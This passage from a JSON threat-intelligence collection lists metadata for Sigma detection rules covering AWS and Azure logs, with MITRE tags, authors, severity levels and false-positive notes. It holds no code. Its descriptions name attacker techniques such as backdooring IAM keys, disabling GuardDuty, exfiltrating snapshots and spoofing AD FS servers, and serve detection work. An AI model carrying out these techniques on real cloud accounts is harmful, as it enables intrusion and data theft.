- "refs": [
- "https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_elasticache_security_group_created.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1136",
- "attack.t1136.003"
- ],
- "creation_date": "2021/07/24",
- "filename": "aws_elasticache_security_group_created.yml",
- "author": "Austin Songer @austinsonger",
- "level": "low",
- "falsepositive": [
- "A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Identifies when an ElastiCache security group has been modified or deleted.",
- "uuid": "7c797da2-9cf2-4523-ba64-33b06339f0cc",
- "value": "AWS ElastiCache Security Group Modified or Deleted",
- "meta": {
- "refs": [
- "https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.t1531"
- ],
- "creation_date": "2021/07/24",
- "filename": "aws_elasticache_security_group_modified_or_deleted.yml",
- "author": "Austin Songer @austinsonger",
- "level": "low",
- "falsepositive": [
- "A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Detects enumeration of accounts configuration via api call to list different instances and services within a short period of time.",
- "uuid": "e9c14b23-47e2-4a8b-8a63-d36618e33d70",
- "value": "Account Enumeration on AWS",
- "meta": {
- "refs": [
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_listing.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1592"
- ],
- "creation_date": "2020/11/21",
- "filename": "aws_enum_listing.yml",
- "author": "toffeebr33k",
- "level": "low",
- "falsepositive": [
- "AWS Config or other configuration scanning activities"
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.",
- "uuid": "6e61ee20-ce00-4f8d-8aee-bedd8216f7e3",
- "value": "AWS GuardDuty Important Change",
- "meta": {
- "refs": [
- "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_guardduty_disruption.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.001"
- ],
- "creation_date": "2020/02/11",
- "filename": "aws_guardduty_disruption.yml",
- "author": "faloker",
- "level": "high",
- "falsepositive": [
- "Valid change in the GuardDuty (e.g. to ignore internal scanners)"
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Detects AWS API key creation for a user by another user.\nBackdoored users can be used to obtain persistence in the AWS environment.\nAlso with this alert, you can detect a flow of AWS keys in your org.\n",
- "uuid": "0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2",
- "value": "AWS IAM Backdoor Users Keys",
- "meta": {
- "refs": [
- "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_iam_backdoor_users_keys.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1098"
- ],
- "creation_date": "2020/02/12",
- "filename": "aws_iam_backdoor_users_keys.yml",
- "author": "faloker",
- "level": "medium",
- "falsepositive": [
- "Adding user keys to their own accounts (the filter cannot cover all possible variants of user naming)",
- "AWS API keys legitimate exchange workflows"
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Detects when an user creates or invokes a lambda function.",
- "uuid": "d914951b-52c8-485f-875e-86abab710c0b",
- "value": "AWS Lambda Function Created or Invoked",
- "meta": {
- "refs": [
- "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1078"
- ],
- "creation_date": "2021/10/03",
- "filename": "aws_lambda_function_created_or_invoked.yml",
- "author": "Austin Songer @austinsonger",
- "level": "low",
- "falsepositive": [
- "Lambda Function created or invoked may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.",
- "If known behavior is causing false positives, it can be exempted from the rule."
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Detects evade to Macie detection.",
- "uuid": "91f6a16c-ef71-437a-99ac-0b070e3ad221",
- "value": "AWS Macie Evasion",
- "meta": {
- "refs": [
- "https://docs.aws.amazon.com/cli/latest/reference/macie/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_macic_evasion.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.001"
- ],
- "creation_date": "2021/07/06",
- "filename": "aws_macic_evasion.yml",
- "author": "Sittikorn S",
- "level": "medium",
- "falsepositive": [
- "System or Network administrator behaviors"
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Detects possible suspicious glue development endpoint activity.",
- "uuid": "4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26",
- "value": "AWS Glue Development Endpoint Activity",
- "meta": {
- "refs": [
- "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/",
- "https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_passed_role_to_glue_development_endpoint.yml"
- ],
- "tags": [
- "attack.privilege_escalation"
- ],
- "creation_date": "2021/10/03",
- "filename": "aws_passed_role_to_glue_development_endpoint.yml",
- "author": "Austin Songer @austinsonger",
- "level": "low",
- "falsepositive": [
- "Glue Development Endpoint Activity may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.",
- "If known behavior is causing false positives, it can be exempted from the rule."
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Detects the change of database master password. It may be a part of data exfiltration.",
- "uuid": "8a63cdd4-6207-414a-85bc-7e032bd3c1a2",
- "value": "AWS RDS Master Password Change",
- "meta": {
- "refs": [
- "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_rds_change_master_password.yml"
- ],
- "tags": [
- "attack.exfiltration",
- "attack.t1020"
- ],
- "creation_date": "2020/02/12",
- "filename": "aws_rds_change_master_password.yml",
- "author": "faloker",
- "level": "medium",
- "falsepositive": [
- "Benign changes to a db instance"
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration.",
- "uuid": "c3f265c7-ff03-4056-8ab2-d486227b4599",
- "value": "Restore Public AWS RDS Instance",
- "meta": {
- "refs": [
- "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_rds_public_db_restore.yml"
- ],
- "tags": [
- "attack.exfiltration",
- "attack.t1020"
- ],
- "creation_date": "2020/02/12",
- "filename": "aws_rds_public_db_restore.yml",
- "author": "faloker",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Detects AWS root account usage",
- "uuid": "8ad1600d-e9dc-4251-b0ee-a65268f29add",
- "value": "AWS Root Credentials",
- "meta": {
- "refs": [
- "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_root_account_usage.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1078.004"
- ],
- "creation_date": "2020/01/21",
- "filename": "aws_root_account_usage.yml",
- "author": "vitaliy0x1",
- "level": "medium",
- "falsepositive": [
- "AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html"
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.",
- "uuid": "3940b5f1-3f46-44aa-b746-ebe615b879e0",
- "value": "AWS Route 53 Domain Transfer Lock Disabled",
- "meta": {
- "refs": [
- "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml",
- "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html",
- "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.credential_access",
- "attack.t1098"
- ],
- "creation_date": "2021/07/22",
- "filename": "aws_route_53_domain_transferred_lock_disabled.yml",
- "author": "Elastic, Austin Songer @austinsonger",
- "level": "low",
- "falsepositive": [
- "A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Detects when a request has been made to transfer a Route 53 domain to another AWS account.",
- "uuid": "b056de1a-6e6e-4e40-a67e-97c9808cf41b",
- "value": "AWS Route 53 Domain Transferred to Another Account",
- "meta": {
- "refs": [
- "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_to_another_account.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.credential_access",
- "attack.t1098"
- ],
- "creation_date": "2021/07/22",
- "filename": "aws_route_53_domain_transferred_to_another_account.yml",
- "author": "Elastic, Austin Songer @austinsonger",
- "level": "low",
- "falsepositive": [
- "A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Detects when a user tampers with S3 data management in Amazon Web Services.",
- "uuid": "78b3756a-7804-4ef7-8555-7b9024a02e2d",
- "value": "AWS S3 Data Management Tampering",
- "meta": {
- "refs": [
- "https://github.com/elastic/detection-rules/pull/1145/files",
- "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html",
- "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html",
- "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html",
- "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html",
- "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html",
- "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_s3_data_management_tampering.yml"
- ],
- "tags": [
- "attack.exfiltration",
- "attack.t1537"
- ],
- "creation_date": "2021/07/24",
- "filename": "aws_s3_data_management_tampering.yml",
- "author": "Austin Songer @austinsonger",
- "level": "low",
- "falsepositive": [
- "A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Detects the modification of the findings on SecurityHub.",
- "uuid": "a607e1fe-74bf-4440-a3ec-b059b9103157",
- "value": "AWS SecurityHub Findings Evasion",
- "meta": {
- "refs": [
- "https://docs.aws.amazon.com/cli/latest/reference/securityhub/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_securityhub_finding_evasion.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562"
- ],
- "creation_date": "2021/06/28",
- "filename": "aws_securityhub_finding_evasion.yml",
- "author": "Sittikorn S",
- "level": "high",
- "falsepositive": [
- "System or Network administrator behaviors",
- "DEV, UAT, SAT environment. You should apply this rule with PROD environment only."
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Detects the modification of an EC2 snapshot's permissions to enable access from another account",
- "uuid": "abae8fec-57bd-4f87-aff6-6e3db989843d",
- "value": "AWS Snapshot Backup Exfiltration",
- "meta": {
- "refs": [
- "https://www.justice.gov/file/1080281/download",
- "https://attack.mitre.org/techniques/T1537/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_snapshot_backup_exfiltration.yml"
- ],
- "tags": [
- "attack.exfiltration",
- "attack.t1537"
- ],
- "creation_date": "2021/05/17",
- "filename": "aws_snapshot_backup_exfiltration.yml",
- "author": "Darin Smith",
- "level": "medium",
- "falsepositive": [
- "Valid change to a snapshot's permissions"
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.",
- "uuid": "905d389b-b853-46d0-9d3d-dea0d3a3cd49",
- "value": "AWS STS AssumeRole Misuse",
- "meta": {
- "refs": [
- "https://github.com/elastic/detection-rules/pull/1214",
- "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_assumerole_misuse.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.privilege_escalation",
- "attack.t1548",
- "attack.t1550",
- "attack.t1550.001"
- ],
- "creation_date": "2021/07/24",
- "filename": "aws_sts_assumerole_misuse.yml",
- "author": "Austin Songer @austinsonger",
- "level": "low",
- "falsepositive": [
- "AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.",
- "AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.",
- "Automated processes that uses Terraform may lead to false positives."
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.",
- "uuid": "b45ab1d2-712f-4f01-a751-df3826969807",
- "value": "AWS STS GetSessionToken Misuse",
- "meta": {
- "refs": [
- "https://github.com/elastic/detection-rules/pull/1213",
- "https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.privilege_escalation",
- "attack.t1548",
- "attack.t1550",
- "attack.t1550.001"
- ],
- "creation_date": "2021/07/24",
- "filename": "aws_sts_getsessiontoken_misuse.yml",
- "author": "Austin Songer @austinsonger",
- "level": "low",
- "falsepositive": [
- "GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.",
- "uuid": "f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e",
- "value": "AWS Suspicious SAML Activity",
- "meta": {
- "refs": [
- "https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html",
- "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_susp_saml_activity.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1078",
- "attack.lateral_movement",
- "attack.t1548",
- "attack.privilege_escalation",
- "attack.t1550",
- "attack.t1550.001"
- ],
- "creation_date": "2021/09/22",
- "filename": "aws_susp_saml_activity.yml",
- "author": "Austin Songer",
- "level": "medium",
- "falsepositive": [
- "Automated processes that uses Terraform may lead to false positives.",
- "SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.",
- "SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.\nWith this alert, it is used to detect anyone is changing password on behalf of other users.\n",
- "uuid": "055fb148-60f8-462d-ad16-26926ce050f1",
- "value": "AWS User Login Profile Was Modified",
- "meta": {
- "refs": [
- "https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_update_login_profile.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1098"
- ],
- "creation_date": "2021/08/09",
- "filename": "aws_update_login_profile.yml",
- "author": "toffeebr33k",
- "level": "high",
- "falsepositive": [
- "Legit User Account Administration"
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service.\nA threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. 
There is no need to compromise an on-prem AD FS server.\nThis can be done programmatically via HTTP requests to Azure.\n", - "uuid": "288a39fc-4914-4831-9ada-270e9dc12cb4", - "value": "Azure Active Directory Hybrid Health AD FS New Server", - "meta": { - "refs": [ - "https://o365blog.com/post/hybridhealthagent/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aadhybridhealth_adfs_new_server.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1578" - ], - "creation_date": "2021/08/26", - "filename": "azure_aadhybridhealth_adfs_new_server.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "level": "medium", - "falsepositive": [ - "Legitimate AD FS servers added to an AAD Health AD FS service instance" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant.\nA threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs.\nThe health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure.\n", - "uuid": "48739819-8230-4ee3-a8ea-e0289d1fb0ff", - "value": "Azure Active Directory Hybrid Health AD FS Service Delete", - "meta": { - "refs": [ - "https://o365blog.com/post/hybridhealthagent/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aadhybridhealth_adfs_service_delete.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1578.003" - ], - "creation_date": "2021/08/26", - "filename": "azure_aadhybridhealth_adfs_service_delete.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "level": "medium", - "falsepositive": [ - "Legitimate AAD Health AD FS service instances being deleted in a tenant" - ], - "logsource.category": "No established 
category", - "logsource.product": "azure" - } - }, - { - "description": "Monitor and alert on conditional access changes where non approved actor removed CA Policy.", - "uuid": "26e7c5e2-6545-481e-b7e6-050143459635", - "value": "CA Policy Removed by Non Approved Actor", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_ca_policy_removedby_bad_actor.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1548" - ], - "creation_date": "2022/07/19", - "filename": "azure_aad_secops_ca_policy_removedby_bad_actor.yml", - "author": "Corissa Koopmans, '@corissalea'", - "level": "medium", - "falsepositive": [ - "Misconfigured role permissions", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? 
Review Modified Properties and compare \"old\" vs \"new\" value.", - "uuid": "50a3c7aa-ec29-44a4-92c1-fce229eef6fc", - "value": "CA Policy Updated by Non Approved Actor", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_ca_policy_updatedby_bad_actor.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1548" - ], - "creation_date": "2022/07/19", - "filename": "azure_aad_secops_ca_policy_updatedby_bad_actor.yml", - "author": "Corissa Koopmans, '@corissalea'", - "level": "medium", - "falsepositive": [ - "Misconfigured role permissions", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Monitor and alert on conditional access changes.", - "uuid": "0922467f-db53-4348-b7bf-dee8d0d348c6", - "value": "New CA Policy by Non-approved Actor", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1548" - ], - "creation_date": "2022/07/18", - "filename": "azure_aad_secops_new_ca_policy_addedby_bad_actor.yml", - "author": "Corissa Koopmans, '@corissalea'", - "level": "medium", - "falsepositive": [ - "Misconfigured role permissions", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Define a baseline threshold and then monitor and adjust to suit your organizational behaviors and limit false alerts from being generated.", - "uuid": "dff74231-dbed-42ab-ba49-83289be2ac3a", - "value": "Sign-in Failure Bad Password Threshold", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_signin_failure_bad_password_threshold.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ], - "creation_date": "2022/04/21", - "filename": "azure_aad_secops_signin_failure_bad_password_threshold.yml", - "author": "Corissa Koopmans, '@corissalea'", - "level": "high", - "falsepositive": [ - "Failed Azure AD Connect Synchronization", - "Service account use with an incorrect password specified", - "Misconfigured systems", - "Vulnerability scanners" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.", - "uuid": "2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a", - "value": "Account Lockout", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_account_lockout.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ], - "creation_date": "2021/10/10", - "filename": "azure_account_lockout.yml", - "author": "AlertIQ", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when an account 
was created and deleted in a short period of time.", - "uuid": "6f583da0-3a90-4566-a4ed-83c09fe18bbf", - "value": "Account Created And Deleted Within A Close Time Frame", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#short-lived-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_account_created_deleted.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ], - "creation_date": "2022/08/11", - "filename": "azure_ad_account_created_deleted.yml", - "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton", - "level": "high", - "falsepositive": [ - "Legit administrative action" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detect successful authentications from countries you do not operate out of.", - "uuid": "8c944ecb-6970-4541-8496-be554b8e2846", - "value": "Successful Authentications From Countries You Do Not Operate Out Of", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml" - ], - "tags": [ - "attack.t1078" - ], - "creation_date": "2022/07/28", - "filename": "azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml", - "author": "MikeDuddington, '@dudders1'", - "level": "medium", - "falsepositive": [ - "If this was approved by System Administrator." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when sign-ins increased by 10% or greater.", - "uuid": "e1d02b53-c03c-4948-b11d-4d00cca49d03", - "value": "Increased Failed Authentications Of Any Type", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_failure_increase.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ], - "creation_date": "2022/08/11", - "filename": "azure_ad_auth_failure_increase.yml", - "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1'", - "level": "medium", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when successful sign-ins increased by 10% or greater.", - "uuid": "67d5f8fc-8325-44e4-8f5f-7c0ac07cb5ae", - "value": "Measurable Increase Of Successful Authentications", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_sucess_increase.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ], - "creation_date": "2022/08/11", - "filename": "azure_ad_auth_sucess_increase.yml", - "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton", - "level": "low", - "falsepositive": [ - "Increase of users in the environment" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detect when authentications to important application(s) only required single-factor authentication", - "uuid": "f272fb46-25f2-422c-b667-45837994980f", - 
"value": "Authentications To Important Apps Using Single Factor Authentication", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_to_important_apps_using_single_factor_auth.yml" - ], - "tags": [ - "attack.t1078" - ], - "creation_date": "2022/07/28", - "filename": "azure_ad_auth_to_important_apps_using_single_factor_auth.yml", - "author": "MikeDuddington, '@dudders1'", - "level": "medium", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Monitor and alert for Bitlocker key retrieval.", - "uuid": "a0413867-daf3-43dd-9245-734b3a787942", - "value": "Bitlocker Key Retrieval", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#bitlocker-key-retrieval", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_bitlocker_key_retrieval.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ], - "creation_date": "2022/06/28", - "filename": "azure_ad_bitlocker_key_retrieval.yml", - "author": "Michael Epping, '@mepples21'", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Monitor and alert for device registration or join events where MFA was not performed.", - "uuid": "5afa454e-030c-4ab4-9253-a90aa7fcc581", - "value": "Device Registration or Join Without MFA", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_device_registration_or_join_without_mfa.yml" - ], - 
